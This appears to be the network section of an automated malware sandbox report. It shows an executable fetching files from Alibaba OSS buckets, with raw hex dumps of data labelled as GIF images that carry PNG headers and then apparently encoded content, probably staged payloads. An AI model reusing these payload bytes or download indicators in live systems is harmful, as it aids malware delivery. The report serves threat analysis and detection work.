                                                                                          • 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                          • 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                          Jan 11, 2025 04:44:59.291975021 CET118.178.60.9443192.168.2.949985CN=cn-hangzhou.oss.aliyuncs.com, O="Alibaba (China) Technology Co., Ltd.", L=HangZhou, ST=ZheJiang, C=CN CN=GlobalSign Organization Validation CA - SHA256 - G3, O=GlobalSign nv-sa, C=BECN=GlobalSign Organization Validation CA - SHA256 - G3, O=GlobalSign nv-sa, C=BE CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEMon Feb 19 06:01:07 CET 2024 Fri Sep 04 02:00:00 CEST 2015Sat Mar 22 06:01:06 CET 2025 Thu Sep 04 02:00:00 CEST 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                          CN=GlobalSign Organization Validation CA - SHA256 - G3, O=GlobalSign nv-sa, C=BECN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEFri Sep 04 02:00:00 CEST 2015Thu Sep 04 02:00:00 CEST 2025
                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.94997339.103.20.1054437616C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-11 03:43:42 UTC111OUTGET /i.dat HTTP/1.1
                                                                                          User-Agent: GetData
                                                                                          Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                          Cache-Control: no-cache
                                                                                          2025-01-11 03:43:43 UTC558INHTTP/1.1 200 OK
                                                                                          Server: AliyunOSS
                                                                                          Date: Sat, 11 Jan 2025 03:43:43 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Content-Length: 512
                                                                                          Connection: close
                                                                                          x-oss-request-id: 6781E8EF998B3E33361BE786
                                                                                          Accept-Ranges: bytes
                                                                                          ETag: "A1CC6E3DD3069453BEF8913F9698C666"
                                                                                          Last-Modified: Fri, 10 Jan 2025 12:35:03 GMT
                                                                                          x-oss-object-type: Normal
                                                                                          x-oss-hash-crc64ecma: 15148768218617465077
                                                                                          x-oss-storage-class: Standard
                                                                                          x-oss-ec: 0048-00000113
                                                                                          Content-Disposition: attachment
                                                                                          x-oss-force-download: true
                                                                                          Content-MD5: ocxuPdMGlFO++JE/lpjGZg==
                                                                                          x-oss-server-time: 3
                                                                                          2025-01-11 03:43:43 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 06 06 02 58 3e 3f 76 37 44 44 1a 54 3a 79 36 31 58 5b 58 5f 38 71 3e 33 5a 4a 46 5d 3e 2e 73 3e 51 53 11 5f 71 38 36 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 51 4d 4d 49 3a 73 66 66 50 50 54 0e 68 69 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 05 05 01 5b 3d 3c 75 34 47 47 19 57 39 7a 35 32 5b 58 5b 5c 3b 72 3d 30 59 49 45 5e 3d 2d 70 3d 52 50 12 5e 70 39 37 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 50 4c 4c 48 3b 72 67 67 51 51 55 0f 69 68 21
                                                                                          Data Ascii: l%00X>?v7DDT:y61X[X_8q>3ZJF]>.s>QS_q86999999999999999999999999999999999QMMI:sffPPThi aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33[=<u4GGW9z52[X[\;r=0YIE^=-p=RP^p97888888888888888888888888888888888PLLH;rggQQUih!


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.94997439.103.20.1054437616C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-11 03:43:44 UTC111OUTGET /a.gif HTTP/1.1
                                                                                          User-Agent: GetData
                                                                                          Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                          Cache-Control: no-cache
                                                                                          2025-01-11 03:43:44 UTC545INHTTP/1.1 200 OK
                                                                                          Server: AliyunOSS
                                                                                          Date: Sat, 11 Jan 2025 03:43:44 GMT
                                                                                          Content-Type: image/gif
                                                                                          Content-Length: 135589
                                                                                          Connection: close
                                                                                          x-oss-request-id: 6781E8F034D7B336306AFBF2
                                                                                          Accept-Ranges: bytes
                                                                                          ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                                                                          Last-Modified: Fri, 10 Jan 2025 12:30:54 GMT
                                                                                          x-oss-object-type: Normal
                                                                                          x-oss-hash-crc64ecma: 8642451798640735006
                                                                                          x-oss-storage-class: Standard
                                                                                          x-oss-ec: 0048-00000104
                                                                                          Content-Disposition: attachment
                                                                                          x-oss-force-download: true
                                                                                          Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                                                                          x-oss-server-time: 9
                                                                                          2025-01-11 03:43:44 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                          Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                          2025-01-11 03:43:44 UTC4096INData Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87
                                                                                          Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                                                                          2025-01-11 03:43:44 UTC4096INData Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92
                                                                                          Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                                                                          2025-01-11 03:43:44 UTC4096INData Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea
                                                                                          Data Ascii: c}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                                                                          2025-01-11 03:43:44 UTC4096INData Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55
                                                                                          Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
                                                                                          2025-01-11 03:43:44 UTC4096INData Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92
                                                                                          Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                                                                          2025-01-11 03:43:44 UTC4096INData Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17
                                                                                          Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                                                                          2025-01-11 03:43:44 UTC4096INData Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58
                                                                                          Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
                                                                                          2025-01-11 03:43:44 UTC4096INData Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52
                                                                                          Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJLR
                                                                                          2025-01-11 03:43:44 UTC4096INData Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19
                                                                                          Data Ascii: WUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.94997539.103.20.1054437616C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-11 03:43:46 UTC111OUTGET /b.gif HTTP/1.1
                                                                                          User-Agent: GetData
                                                                                          Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                          Cache-Control: no-cache
                                                                                          2025-01-11 03:43:46 UTC547INHTTP/1.1 200 OK
                                                                                          Server: AliyunOSS
                                                                                          Date: Sat, 11 Jan 2025 03:43:46 GMT
                                                                                          Content-Type: image/gif
                                                                                          Content-Length: 125333
                                                                                          Connection: close
                                                                                          x-oss-request-id: 6781E8F29F6B6036370CAEFC
                                                                                          Accept-Ranges: bytes
                                                                                          ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                                                                          Last-Modified: Fri, 10 Jan 2025 12:30:54 GMT
                                                                                          x-oss-object-type: Normal
                                                                                          x-oss-hash-crc64ecma: 10333201072197591521
                                                                                          x-oss-storage-class: Standard
                                                                                          x-oss-ec: 0048-00000104
                                                                                          Content-Disposition: attachment
                                                                                          x-oss-force-download: true
                                                                                          Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                                                                          x-oss-server-time: 18
                                                                                          2025-01-11 03:43:46 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                          Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                          2025-01-11 03:43:46 UTC4096INData Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19
                                                                                          Data Ascii: ^_X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                                                                          2025-01-11 03:43:46 UTC4096INData Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0
                                                                                          Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                                                                          2025-01-11 03:43:46 UTC4096INData Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9
                                                                                          Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                                                                          2025-01-11 03:43:46 UTC4096INData Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7
                                                                                          Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
